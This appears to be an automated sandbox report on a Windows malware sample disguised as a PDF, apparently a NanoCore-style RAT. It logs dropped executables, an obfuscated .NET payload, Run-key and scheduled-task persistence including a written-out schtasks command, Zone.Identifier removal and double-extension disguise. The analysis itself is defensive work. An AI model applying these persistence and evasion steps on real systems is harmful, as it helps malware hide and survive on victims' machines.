Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C2AFDB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 6_2_00C2AFDB
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2220:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3956:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5116:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3696:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{d95e5ad5-6193-4689-a919-7befded6bfa5}
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Command line argument: sfxname 0_2_003EDF1E
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Command line argument: sfxstime 0_2_003EDF1E
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Command line argument: STARTDLG 0_2_003EDF1E
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Command line argument: xzB 0_2_003EDF1E
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe File written: C:\Users\user\AppData\Local\Temp\Folder10_51\wfccrina.ini Jump to behavior
Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: 004349256789197.pdf.scr.exe Static file information: File size 1181640 > 1048576
Source: 004349256789197.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 004349256789197.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 004349256789197.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 004349256789197.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 004349256789197.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 004349256789197.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 004349256789197.pdf.scr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: 004349256789197.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 004349256789197.pdf.scr.exe, 00000000.00000000.244080048.0000000000403000.00000002.00000001.01000000.00000003.sdmp, 004349256789197.pdf.scr.exe, 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
Source: 004349256789197.pdf.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 004349256789197.pdf.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 004349256789197.pdf.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 004349256789197.pdf.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 004349256789197.pdf.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EF640 push ecx; ret 0_2_003EF653
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EEB78 push eax; ret 0_2_003EEB96
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C362CC pushad ; ret 6_2_00C362D6
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BF0332 push edi; ret 6_2_00BF0333
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC0E06 push ecx; ret 6_2_00BC0E19
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BA5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 6_2_00BA5D78
PE file contains sections with non-standard names
Source: 004349256789197.pdf.scr.exe Static PE information: section name: .didat
PE file contains an invalid checksum
Source: ihgsvw.exe.0.dr Static PE information: real checksum: 0x15a0e8 should be: 0x1560ce
Source: 004349256789197.pdf.scr.exe Static PE information: real checksum: 0x0 should be: 0x12da1b
File is packed with WinRar
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe File created: C:\Users\user\AppData\Local\Temp\Folder10_51\__tmp_rar_sfx_access_check_3874750 Jump to behavior
Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Jump to dropped file
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe File created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome Jump to behavior
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File opened: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete Jump to behavior
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.scr Static PE information: 004349256789197.pdf.scr.exe
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C325A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 6_2_00C325A0
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
